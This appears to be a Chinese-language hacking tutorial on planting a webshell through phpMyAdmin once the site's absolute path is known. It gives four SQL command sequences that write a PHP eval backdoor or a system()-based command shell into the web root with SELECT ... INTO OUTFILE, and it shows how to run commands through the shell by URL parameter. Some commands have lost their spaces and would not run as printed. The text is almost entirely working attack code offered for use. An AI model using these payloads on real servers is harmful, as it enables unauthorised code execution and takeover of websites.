通过phpmyadmin各种技巧拿webshell

注：一下所有方法得先知道网站的绝对路径

第一种

• CREATE TABLE`mysql`.`darkmoon`(`darkmoon1`TEXT NOTNULL);

• INSERT INTO`mysql`.`darkmoon`(`darkmoon1`)VALUES(‘<?php@eval($_POST[pass]);?>’);

• SELECT`darkmoon1`FROM`darkmoon`INTO OUTFILE’d:/wamp/www/exehack.php’;

• DROP TABLE IFEXISTS`darkmoon`;
  
  

（这种方法是最为常见的成功率也比较高,懂sql语句的朋友一眼就应该可以看懂什么意思）

以上代码意思就是选择musql数据库 然后建立一个darkmoon的表然后加入一个名字为darkmoon1的字段

然后在darkmoon1的字段中插入一句话代码

然后从darkmoon1字段里面导出一句话到d:/wamp/www/exehack.php 的文件名（这里的路径就是网站的程序路径）

最后就是删除darkmoon这个表。

第二种方法

• Create TABLE moon(darkmoon text NOTNULL);

• Insert INTO moon(darkmoon)VALUES(‘<?php@eval($_POST[pass]);?>’);

• select darkmoon from moon into outfile’d:/wamp/www/exehack.php’;

• Drop TABLE IFEXISTS moon;
  
  

以上方法原理基本与方法一一致

第三种方法：

• select'<?php@eval($_POST[pass]);?>’INTO OUTFILE’d:/wamp/www/exehack.php’
  
  

第四种方法

• select'<?phpecho\'<pre>\’;system($_GET[\’cmd\’]);echo\'</pre>\’;?>’INTO OUTFILE’d:/wamp/www/exehack.php’
  
  

不同之处在于导出成功后可以直接执行DOS命令（只要权限够大）

使用方法:www.xxx.com/exehack.php?cmd=  (cmd=后面直接执行dos命令)

以上4种方法一般情况下足够拿到网站的webshell权限了。